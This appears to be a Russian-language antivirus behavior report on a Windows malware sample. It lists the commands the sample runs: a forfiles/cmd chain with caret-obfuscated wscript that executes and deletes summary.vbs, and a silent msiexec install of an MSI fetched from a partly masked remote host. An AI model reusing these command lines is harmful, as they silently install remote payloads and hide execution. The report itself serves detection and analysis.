Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' <Текущая директория>\summary.vbs
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /c ws^c^r^ipt^.exe <Текущая директория>\summary.vbs&del "<Текущая директория>\summary.vbs"
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\summary.vbs
Удаляет следующие файлы
- <Текущая директория>\summary.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://kr###gate.com/test/1.msi
UDP
- DNS ASK kr###gate.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /c ws^c^r^ipt^.exe <Текущая директория>\summary.vbs&del "<Текущая директория>\summary.vbs"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ws^c^r^ipt^.exe <Текущая директория>\summary.vbs&del <Текущая директория>\summary.vbs
- '<SYSTEM32>\cmd.exe' /c msiexec/q/ihttp://kr###gate.com/test/1.msi
- '<SYSTEM32>\msiexec.exe' /q/ihttp://kr###gate.com/test/1.msi
